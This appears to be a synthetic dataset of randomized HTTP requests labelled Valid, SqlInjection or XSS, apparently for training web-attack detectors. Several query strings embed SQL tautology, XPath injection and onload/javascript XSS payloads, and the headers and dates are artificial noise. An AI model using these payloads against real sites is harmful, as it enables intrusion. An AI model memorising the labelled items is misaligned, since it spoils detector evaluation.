GET /iseEtJgV7/evS@ivs8WOInQ1/oEtr33QG/ecooywR/emse/ikG9IjRrHLY8Ue/AlinkA5fC/hrwnhjuahhwUs/rNwnnstalOtgonWtltt.aspx?0atsoauh=aAgcowit&8Nsnt86yit0s=0299519066&LQ.group byce3BJ=alKp3w9&meeeisat=+t%40%5Co+&ssBn1gAbehes4=eUhX-qy.HD&aCebe6chcbnx=ffVpe%2Fopflle%2Fgfi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+++++or++%27ted%27+++%3D+%27&temnh=01264597&gk9iDWEuxopen__=0&EdoedT9IeTe=4&VAebeswdiir=tNvw.&Hbckdivps=mZICRPHOEXg9&ra=awnaKanlctip HTTP/1.1
Host: www.ailnCrha.st:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ott021en-epsuieo;q=0.2, 9o-Aleezos;q=0.8, EnsLs-nlie
Cache-Control: no-store
Client-ip: 202.44.218.0
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Fri, 24 Nov 06 14:36:41 GMT
ETag: W/"LgrbNKdjGgCPMpMckC"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Tue, 20 Dec 05 08:58:22 GMT
If-Unmodified-Since: Sun, 22 Mar 09 12:46:13 CET
If-Match: "yrIQ92TyCN41oG5-D4hS"
If-None-Match: "jXfoYw5SlSwVNd7CGXV"
If-Range: *
Max-Forwards: 7
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Paadee rEj1hp=eheis8
Range: -88469
Referer: http://www.aan5gohe.org/stgotel4/wnnR/ieSrr/tn8xcibf.msf
TE: gzip;q=0.2,gzip
Trailer: Date
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 2.8; en-Op; rv:4.2.0) Gecko/10137557
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4726x3292
Via: i3l/7.4 92.76.229.198, Inx5f/1.2 www.te9N.jpg
Transfer-Encoding: identity
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49512
Start - Id: 6782
class: Valid
PUT /29c/nehHneilevfaepfo6an/3p-2iGqi/1ihontioh0eXnoo/rXwDM7QLNlEUINezHY/rcTPGlk4zOeQ8/pYj/oz2retto486ioitRa/e3_zIO3Pxd0uWrv5.jpg? HTTP/1.0
Content-Length: 150
Content-Language: TtuLt
Content-Encoding: compress
Content-Location: /olmla/e1tP/PEnoyRnT/leqtrU.png
Content-MD5: ckFyZXN1bjIyZWZmMFNlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 May 06 07:09:14 UTC
Last-Modified: Wed, 19 Sep 07 23:18:24 CET
Host: www.tssll4.cz
Connection: n6ooeest
Accept: image/gif, application/rtf;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.7, identity;q=0.3
Accept-Language: Ec-jtaia
Cache-Control: no-transform
Client-ip: 181.153.33.99
Cookie: 2iw1GS=hC7gcRKUq;muere=)uthlshy;4?;b12oekornpie= nOphp5g:(ze sooedn:
Cookie2: $Version="6"
Date: Fri, 05 Dec 08 12:52:09 CET
ETag: "LpeVDltSXUkKRJy8A"
Expect: 100-continue
From: ooti@eeee.gov
If-Modified-Since: Tue, 23 Dec 08 10:27:33 UTC
If-Unmodified-Since: Thu, 03 Dec 09 10:04:09 GMT
If-Match: "WKNwIBXU1weiSLg"
If-None-Match: "fLZ3wdECIY-0PcH2"
If-Range: "LfsB2g_PYkkyJwD"
Max-Forwards: 88
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: 3ptg ojj0e=tta6i
Authorization: Basic bXRoaGVkZTphZGVlbHI=
Range: -8361
Referer: /mnezbhNi/anyldntE/ze5akj.jpeg
TE: gzip
Trailer: Expect
User-Agent: Mozilla/3.6 (compatible; srtmrsaCae; Unix; ceuh; 5titiad)
UA-CPU: 68000
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 037x6645
Via: HTTP/2.8 www.exe9.shtml
Transfer-Encoding: deflate
Upgrade: 8tEuth/3.6, 0ndlte/6.2, lnc/7.9, e08/7.6
Warning: 629 83.9.8.183:30508 "obn1e" "Thu, 02 Jun 05 06:53:51 GMT"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 5910384052
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fci=59283&3itud=8t&z5uaa=h1dnonEeEo8ginputcI&ni=86377&zo=a@yh4TD@AuZ&iw6aRYRhDd=0133&Z8vSyE4=513&fe4ysoo=138020&yP9n6po=leo9H&iu4ttth9pil=rotnwmes

End - Id: 6782
Start - Id: 13485
class: Valid
GET /aCP/kUIk/eYo2b/fthj/r4st20/WgBL_GA.html?tefrhto=pCH3.CrxLGmG&7SrcpRLchildJLqgO=lst17uw HTTP/1.1
Host: www.6eolcaas.it
Connection: keep-alive
Accept: audio/basic;q=0.8
Accept-Charset: x-mac-roman;q=0.0, hz-gb-2312
Accept-Encoding: *
Accept-Language: Onsantoi-irr, co-0wc;q=0.3, eau-G0tnpote
Cache-Control: max-stale
Client-ip: 50.107.120.126
Cookie: otw=506915249;yu=ten9&tol hjke
Cookie2: $Version="69"
Date: Fri, 17 Mar 06 05:46:03 CET
ETag: W/"fmSHMBSKi-_9zce"
Expect: 100-continue
From: iaeuease@fasecroo.st
If-Modified-Since: Wed, 03 Oct 07 22:45:56 GMT
If-Unmodified-Since: Sun, 03 Dec 06 13:17:09 UTC
If-Match: "483Nap08eev40I4WsRA"
If-None-Match: *
If-Range: Sun, 01 Oct 06 07:01:18 GMT
Max-Forwards: 583
MIME-Version: 0.3
Pragma: idNeqame=t0siTsr
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: NTLM aWVlNHNlcnY5dG5lc0x1N3NmdGhjY25qaGNvdXpoamR4dmNkb3M=
Range: 410061-12754,11314-9
Referer: /5Yoav/zyloL/4rl3/eA3hLoui/Rrtse.rar
TE: gzip,deflate
Trailer: Trailer
User-Agent: Mozilla/8.6 (X11; U; Unix 6.7; Es-1t; rv:7.9.0) Gecko/05948820
UA-CPU: x86
UA-Disp: 6344,8500,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: 6.2 243.225.205.2, HTTP/8.1 www.c5ot2.htm, FTP/6.2 47.5.69.123
Transfer-Encoding: deflate
Upgrade: odo/1.8
Warning: 010 103.159.234.205 "gl6ayodfhturh" "Fri, 18 Jul 08 24:07:19 CET"
X-Forwarded-For: 25.130.189.6
X-Serial-Number: 648318819511788387
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13485
Start - Id: 22114
class: Valid
GET /tM.eiyg/tmSesnbyiteddeeei/0mmem/m5Rhboot.ini/tfqgMrTn96kgoe/j53zXEjcn/cIvkzH/PBpcatTXrWM5lTexp_/imhrrEnakstdA8ys5m/a6e4hst.asp? HTTP/1.0
Host: www.mas1fol.biz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 204.187.68.18
Cookie: asuS=20;HeavJ=tlD
Cookie2: $Version="597"
Date: Mon, 23 Apr 07 12:57:35 UTC
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: 100-continue
From: cemr@yhuhe3Dw.cz
If-Modified-Since: Fri, 21 Dec 07 17:46:06 GMT
If-Unmodified-Since: Mon, 23 Nov 09 16:30:53 GMT
If-Match: *
If-None-Match: "T-r0GBZOhSuXb@FzLR"
If-Range: "Mp4wz35w-47kZLGT"
Max-Forwards: 8
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="trr4ros"
Authorization: gtsru ohiiOQ=eo5xye
Range: 1976-
Referer: http://www.t7emtsHm.it/laiwMtey.txt
TE: trailers,chunked;q=0.0
Trailer: Range
User-Agent: dcttsvh9zertiteSne
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 9.7 www.vsaSi.css
Transfer-Encoding: deflate
Upgrade: nistro/9.0, m14h/4.7
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 174.83.21.40
X-Serial-Number: 42920569636252963929
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22114
Start - Id: 42060
class: SqlInjection
GET /wkD-ZrKbb/hEOYH4_tiMsIKP6cH.Eo.htm?8lym=wPgBgkW5s24&Ep6r08=%27++++OR++++%27t0s%27++++BETWEEN+++++%27R%27+AND++%27T&terorattot=sEnSzV3Ri_&iliformfXlikewde7=vXllmjRi&37zFexecxgs6K47=59779536&OESON5=%2Bk2eWrtsm&pepheiyeha7tgi=12770402&c2rHaskEts=btxscriptnid%5Cptnrmdep6&grcnpgrpgiustrT=a3_oxAJ HTTP/1.0
Host: www.arar.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.8, iso-8859-7;q=0.0, us-ascii;q=0.8
Accept-Encoding: compress, deflate;q=0.6, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 154.191.132.233
Cookie: 8IRoptAcZq=%apc
Cookie2: $Version="46"
Date: Mon, 13 Oct 08 24:10:30 GMT
ETag: W/"0OzoIBhLz0TEHDP7"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Fri, 05 Jan 07 07:27:18 GMT
If-Unmodified-Since: Wed, 11 Feb 04 05:40:43 UTC
If-Match: "4hCvlIJLLlFBBBJ"
If-None-Match: *
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 5653
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: Basic c3VubzpuZWdhZA==
Authorization: Basic aWN5NXA6VWVFaG50aHI=
Range: -99729
Referer: /0nadjfl/aRxetn/hniaeu.htm
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: Mozilla/7.7 (compatible; MSIE 7.7; Linux i586; Dq1bu; l7efniee; r3emiet9i)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: 9.8 150.228.124.21:5337, HTTP/1.6 www.emooteM.png
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42060
Start - Id: 12903
class: Valid
GET /YnscriptoKxeOU/rcphomeU6_@Kzg6binYk.mspx? HTTP/1.0
Host: 175.64.0.111
Connection: etotte
Accept: */*
Accept-Charset: utf-7, windows-1257;q=0.5, ks_c_5601-1987, iso-8859-3;q=0.8
Accept-Encoding: 
Accept-Language: o-hcii;q=0.9, cg-x7oo2;q=0.3, srar-h39osiEa, icm-inzlee, 8E1oen-hc;q=0.1
Cache-Control: only-if-cached
Client-ip: 236.220.231.27
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="03"
Date: Thu, 22 May 08 07:27:48 UTC
ETag: "_sbhlPYinSmBJN-h8KGx"
Expect: 100-continue
From: scYeU@sc8oil.it
If-Modified-Since: Sat, 28 Mar 09 06:48:30 CET
If-Unmodified-Since: Wed, 04 Feb 09 14:04:48 CET
If-Match: *
If-None-Match: "1J0X7TlS9FF3mqtMVw"
If-Range: Fri, 21 Mar 08 01:05:49 UTC
Max-Forwards: 0491
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM bzZPZ2JsbmFleXRTbnR5eHJkc2FhaWlzczJudDduczdhaXNtdG5oYWU=
Authorization: mttne evieno9m=opttCr
Range: 976-,-97584
Referer: http://oenar.fr/speoe9/fhotthy.js
TE: trailers
Trailer: Range
User-Agent: hspmlldatt/1.0.0
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 253x5878
Via: rrStan/3.4 www.diOn4.htm, ntoo/3.1 10.64.164.73, 9.3 252.225.150.201
Transfer-Encoding: compress
Upgrade: ioeah/7.8, nuq/3.5, nnm/0.8
Warning: 007 www.eeatpoht.html "zqonsesaGo" 
X-Forwarded-For: 85.130.149.249
X-Serial-Number: 194126085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12903
Start - Id: 47085
class: XSS
GET /ax3DW_yTsHH/dEDsUnj/iifvneiiee9aq6n/echoqlZ/icrhogu8t9.mdb?C4nenrrm=dettax%3Ceit%26a&nmn=6oehhaG7dtnimlto6&tghlcd1a=tToeeieorsow&V.EpzdjlocationU=38508&tcmseilasae=6952&zgaac60gs=d++onload%3Djavascript%3A+++alert++++%28odmSeys.he8eims4w2o%29&klooo97sohqse=oZvWwqz%40Nh&o4natauTna=2335015&oureuxhy0rjaSt=htaccesg2O%28hneeer%3Dss&rw4Ew4wefvtmcio=n%40sbdAHoDstyle HTTP/1.0
Host: www.etngen.net:80
Connection: keep-alive
Accept: application/*;q=0.0, application/*, video/mpeg
Accept-Charset: iso-8859-6;q=0.5, utf-8, x-mac-greek;q=0.8, windows-1251, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=845
Client-ip: 4.100.87.145
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="41"
Date: Mon, 01 Dec 08 18:37:45 CET
ETag: W/"5flgWqTfDcqEkoyRjTt"
Expect: 100-continue
From: en3oiyg@ysel.org
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "XvGosSJ6ArIHb4SwJ"
If-Range: Thu, 18 Aug 05 15:18:58 UTC
Max-Forwards: 592
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: NTLM RG1mM3NqbEVxZ29jZW1hdHJsOG9lYWlzZ2ZnY3R3YmhlT2VhZWh4MmU=
Authorization: NTLM cmxpZWdvZGlkbHRkdGhyYWk1ZGl3TW1udmdNajd4dG50Yk8=
Range: -409656
Referer: /ohZni/19ootwR/9egAg/6katod9a/htau9Kia.css
TE: trailers
Trailer: Warning
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 6.8; bi-if; rv:3.8.2) Gecko/87141077
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: HTTP/0.1 198.232.0.144, 3yha2/7.3 www.srss.css
Transfer-Encoding: deflate
Upgrade: aaw/8.6, roe/2.3
Warning: 097 105.248.59.21 "trypi" "Sat, 04 Jun 05 05:58:55 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47085
Start - Id: 25489
class: Valid
GET /ea3inueeaottxwsne.php4?hlxtl=9PuEGz&sHni48jim=srAee&rpo0ebita=62119809&noyh7dtshrmeyle=exHaxvf6dh79e1gtrd&atotksetrtYth=946&aeHp=9914&R2sF89=476&Esjstoteo=tauhbcEh%3Ee&tepirrm5e33ur=alilny3eua%3B HTTP/1.0
Host: www.cakpxt.uk
Connection: tano75
Accept: video/mpeg, video/*;q=0.0
Accept-Charset: iso-2022-jp, x-mac-icelandic, big5
Accept-Encoding: deflate;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 107.125.36.161
Cookie: @@lgB5phpmIV=8429;0thn9eeonu7ccu=aam i;2oz=r31e=Niqsy:2ss;hO4lib@L=00;tnoen=unIiefn9b;r1vwbwnd=5
Cookie2: $Version="520"
Date: Mon, 10 May 04 16:09:49 CET
ETag: W/"MoR@n3ud436xNtfa05__"
Expect: 100-continue
From: qinstr2@tr2acan.st
If-Modified-Since: Tue, 01 Dec 09 19:58:29 GMT
If-Unmodified-Since: Sun, 28 Feb 10 01:29:11 CET
If-Match: "_4rQny0whY4KzrXFIYD"
If-None-Match: "GJIn3bNk2-mv-pMj5"
If-Range: Thu, 20 Mar 08 17:30:39 UTC
Max-Forwards: 3
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWNjdHNqOm90alM0
Authorization: NTLM OHRsUjdhYWZ0ZW1tYWxjc281N0VyYWV5NUhDaGxmbndpbw==
Range: 95-099091,5-
Referer: /pimt/tuere7d/dfaueA/plraar.asp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 6.1; ac-bt; rv:8.7.3) Gecko/24510965
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: HTTP/8.2 www.msnmtpat.gif:3, 9.6 177.234.88.112
Transfer-Encoding: identity
Upgrade: jSmra/4.8, s3j/2.1, siu/5.7, tqdjm/8.8, nha/7.4
Warning: 898 81.55.160.68 "e9az1gc0lmr7ohaclob" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25489
Start - Id: 9485
class: Valid
GET /0a-lOT908Rk6/eHn9-M0s.JxP/mY/lnd/oE/c0Ga-wG.png?ahroe=j4bPQc&iqamcl=aschi0iuoaO&bA-4q3=fCgJr&dfof=9ez%26dpa+te&7teiEkue=tMSht&nTleneaeab6rm=vhttpstmpa&8knDr=httpseaeai%24+hfiaccept&hwuhxiidt8gt=xieoeAztcukef2e&aTruwwr0=8mckX8bZ2HeT&Yo1Tasiaoe9Ye=d0nKWm HTTP/1.1
Host: 172.245.58.16
Connection: keep-alive
Accept: image/png;q=0.6
Accept-Charset: x-mac-hebrew, macintosh, cp-932
Accept-Encoding: *;q=0.6
Accept-Language: hne4e-i5s0l7;q=0.4
Cache-Control: max-stale
Client-ip: 0.101.49.45
Cookie: hthghlykW4shsh=uenoFw7stake;sedzsber=b6replace1/;en74p=tri)f;eodhwliroSernan=92
Cookie2: $Version="2"
Date: Fri, 02 May 08 17:34:30 GMT
ETag: W/"OV8lIQPxR4a1ovUasGG"
Expect: 100-continue
From: gr7u@tiioRdzAr.net
If-Modified-Since: Sat, 16 Feb 08 12:49:16 GMT
If-Unmodified-Since: Fri, 03 Mar 06 11:29:44 GMT
If-Match: "7y4-IJDIhkPLA-clvpZ"
If-None-Match: *
If-Range: Tue, 24 Oct 06 14:34:23 CET
Max-Forwards: 9523
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: NTLM T29FZXZ1aWU1aXM3aHBwYzdZZWVlbHlqaUU5RW9kY21ob24=
Range: -6,7-441
Referer: http://1T6le.gov/dmeh0ayt.css
TE: gzip;q=0.0,trailers
Trailer: Accept
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 9.2; tc-fT; rv:2.9.0) Gecko/85484546
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 279x7075
Via: 1.9 233.110.241.83:02, FTP/5.0 www.synSs.jpg:3, 8.7 49.133.72.20
Transfer-Encoding: rtnsi
Upgrade: dttwl/5.1, totora/7.4, s2q/7.4
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 477624776956
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9485
Start - Id: 13104
class: Valid
GET /azrlEW0/32M1T69HQbCqqXa9wgxV/anmdnu9saito/ontea/ezr7QivK94Vq/usOcGAQvF/d7hTUc-66RkYpi5o/rXdY.4obzdBOT6M/Vfromq7hUo-pLX.png? HTTP/1.0
Host: www.a89h.net
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=58934
Client-ip: 205.66.41.114
Cookie: bO0neie9dpr=8;esiwa=klem;hfeaL=6205;nawHSf=8118119;sov5tynCjinfOpw=o;JM_WWDWVP9e=e..zeAaN6i
Cookie2: $Version="38"
Date: Fri, 18 Apr 08 11:43:45 GMT
ETag: W/"PBAqh8lskvytzoaH_"
Expect: 100-continue
From: lxksWme@metbhbeef.it
If-Modified-Since: Sat, 11 Sep 04 02:32:15 UTC
If-Unmodified-Since: Wed, 28 Jan 09 08:55:55 UTC
If-Match: "@9f09aKb0cRMwySJx2fD"
If-None-Match: "s.ZVO0qBeYePdPJR1"
If-Range: Sun, 17 Apr 05 08:43:53 GMT
Max-Forwards: 56
MIME-Version: 5.0
Pragma: ln='t'
Proxy-Authorization: NTLM Nm5lenJ0dWtvZ29tcEZ4c3NmZTlpdG9FY2V1c2VhY3RpdG5hdGp0dWppaXJ0Z2U=
Authorization: Basic dWVuYW86YWFhc3pkZQ==
Range: -7936
Referer: http://9nrE2i.ch/srorin/oe8s9si.dll
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: ulOdy9d6o (hRTZYT8; wt1cF.4eR; wxdb8kBp@4; ed9zrSr7t; iEmxK4vh)
UA-CPU: Sparc
UA-Disp: 160,1655,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 824x5832
Via: soet/3.6 130.238.96.214, eNdaH/9.1 31.158.216.232
Transfer-Encoding: gzip
Upgrade: rddiP/8.7
Warning: 653 www.trsee4n5.css "hrrw2pOe" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 74451528959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13104
Start - Id: 3235
class: Valid
GET /nqcat3ZVS.group by3bb/bodyrconnect29SiEtuVsystemvF/etJ/lio/1pnhTuq.exe?M6008JjOrcxterms=hdyWOqay&eOfWmkOPAh=i0G81JH&shtceeIsg=3780&ligq=e8Cuf&q0oSd=oCepiaoanna&tljue6pztfousk=rrisjta1afa5Cia1&Hssfiwip00=ter3sNtsb5GeTT&aiefg1augaumnr=cCQa&om=a+o&hnmh=46032830&ke=ood%7EegatjedT8n%2Bdotc&nfld5akgmspeae=d0n&2omshifmigy=f1NZl&ssEneiteticiei=07686&tgqarUamEma=57644736 HTTP/1.1
Host: 80.47.161.72
Connection: close
Accept: image/*;q=0.5, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=0716
Client-ip: 202.10.78.54
Cookie: 2ihAtnebepf=hc7vqsK0GudE;c5maolone=raqh3;hne=tP6bRu2pjo
Cookie2: $Version="14"
Date: Wed, 31 Mar 04 17:57:02 CET
ETag: "7M8BfkLionI7Wujw"
Expect: desjR
From: enn6@rliEa.it
If-Modified-Since: Fri, 17 Mar 06 10:06:52 GMT
If-Unmodified-Since: Wed, 29 Apr 09 09:50:44 UTC
If-Match: "ugXW9@mqzcCKyCO3BJ"
If-None-Match: *
If-Range: Mon, 01 Oct 07 22:21:59 UTC
Max-Forwards: 251
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: NTLM ZWFuUnR1ZWNwYjVoaU9pYzhvYmZ0dDRuZmxmM2NkQXdlM25s
Range: -9119
Referer: /agphor/knfce6tR/heatyt4t.tar.gz
TE: trailers,trailers
Trailer: Host
User-Agent: t4HOFM http://www.24gewreD.st
UA-CPU: PowerPC
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 796x812
Via: HTTP/4.5 www.aw0e.html, HTTP/7.7 www.eerowe.shtml:8, 8.4 218.78.172.163
Transfer-Encoding: compress
Upgrade: Anim/9.2, 4ebtk/6.4
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3235
Start - Id: 6742
class: Valid
POST /kPOkf0QOO.Hf.jpeg? HTTP/1.1
Content-Length: 285
Content-Language: oicdelc
Content-Encoding: identity
Content-Location: http://www.wternqi.com/tAdhL/dufLee8/bdneBtt7.fgf
Content-MD5: b2M1cWJDMFN0MHNpMWV0Tw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Apr 10 06:17:24 UTC
Last-Modified: Sat, 02 Jul 05 20:34:28 CET
Host: www.riyo.gov
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1251;q=0.0, iso-10646-ucs-2;q=0.5
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 50.80.85.90
Cookie: teoWTLJPlog=609441;otaaohgnrmdgar=9
Cookie2: $Version="87"
Date: Sun, 23 Sep 07 18:17:43 UTC
ETag: W/"47QAu0uB2I2rgLYT56rI"
Expect: hete
From: yhiii@asou.ch
If-Modified-Since: Mon, 20 Sep 04 02:46:50 UTC
If-Unmodified-Since: Sat, 30 Jun 07 24:07:53 CET
If-Match: *
If-None-Match: "rjFh9LvDeXRGzEbSDVs"
If-Range: *
Max-Forwards: 9631
MIME-Version: 5.9
Pragma: wghu='aO'
Proxy-Authorization: NTLM aW5pOFZhdnAxZWhtZnBldGdkaERvS3NkNWphYXNzZHRyZnQ2MmV6dWky
Authorization: FEo3 te9cs5Uo=ahrUO
Range: -132996,01904-08
Referer: /ue6ocren/ntjest/rha6/hAxTP1a.gif
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.1 (compatible; Konqueror/4.9; Win98; fcqntt)
UA-CPU: Sparc
UA-Disp: 2751,8436,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3470x340
Via: 7.3 29.168.125.169:5, dtgyte/2.5 11.198.169.163
Transfer-Encoding: gzip
Upgrade: t4isjy/0.0
Warning: 194 www.tfbd.jpg "lMexobntm6" 
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 377808112519787553
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

tooae=fY7x@f9&lvn=11a&In=ry@Nl6i-5o.&evs9niEentit=378465530&wiHInode7aC9=f&ayveciqciatiEnH=8735834503&inrlia3Rtnseh=mHSF_BNkbg&edhtgtoriFct=union>gFahesy 82&hlu=eyhm0dn&xltoeosjnoa=wr ef jan&yaeettnbeoiho=1467802&Creyndoaaeinu=d6Js8aqUgg&z43snlo2Bdsedpt=hdf&r2fgn=leo&aciea2=n3re

End - Id: 6742
Start - Id: 17883
class: Valid
GET /xHy8MWqZxEQ/be5atveh8Eai/ndqRN3nQ/cFq3aNlBY-J/atphwsAm/aREH83hM/htfdswe3/OKo6zk0/196LqAV/gAmacghUo64.mspx?t9ossi0tiysp=62903&thcjbmeonaotw=wrecTs&9omfa9ot=hl1nsejrT2l6ard&aftwa1=S%5D4c%3BodBS&ss2ten9bla=04434&1MA.v3=tynes&i68feaeedh=660&hteetoehoAe=7404416&o50L3m2NvH=759171&e9xqBAr.pb5h=esJtGXdh9Imc&txr=MKt&An=95279927&lxnitEkse5mos=44988 HTTP/1.0
Host: 25.12.154.180
Connection: keep-alive
Accept: application/*;q=0.5, video/*;q=0.6, video/quicktime
Accept-Charset: iso-8859-15
Accept-Encoding: *;q=0.1
Accept-Language: er-aaoNtnH;q=0.9, smsaTor-na1yr;q=0.7, sovneq-ltngmco, jDrd-sosea
Cache-Control: max-age=923
Client-ip: 134.171.238.70
Cookie: ohiitTchyhuAout=sesas;toust=ehg
Cookie2: $Version="47"
Date: Mon, 26 Dec 05 17:32:30 GMT
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: uicsxe@leXtsDeref.ch
If-Modified-Since: Tue, 25 Dec 07 22:58:52 GMT
If-Unmodified-Since: Fri, 09 Sep 05 24:19:56 CET
If-Match: "NProhep70YgBE6sRjmXB"
If-None-Match: "HPVP1dX5ii9eI82vdDq1"
If-Range: Fri, 21 Sep 07 20:46:44 GMT
Max-Forwards: 185
MIME-Version: 8.8
Pragma: sws8eoe='ct5ivI'
Proxy-Authorization: Digest realm
Authorization: NTLM bW44c2VHbXN1ZnNBYmVmcHhwZWRlc2FlYmxFb3lvc2hrMmVqbDF1M3JSNg==
Range: -7
Referer: http://www.Lv47ee.uk/nuayri/orhvsT2y/2aaoldhr/94eccn.asmx
TE: trailers,chunked;q=0.7
Trailer: Connection
User-Agent: tdoOh (ezH2eOHA; ryGcc17VUe; oKKb8P; 3C4ij_YhEH; e2YZMH9.)
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 8176x316
Via: 1.1 22.163.217.31
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: ----------------------
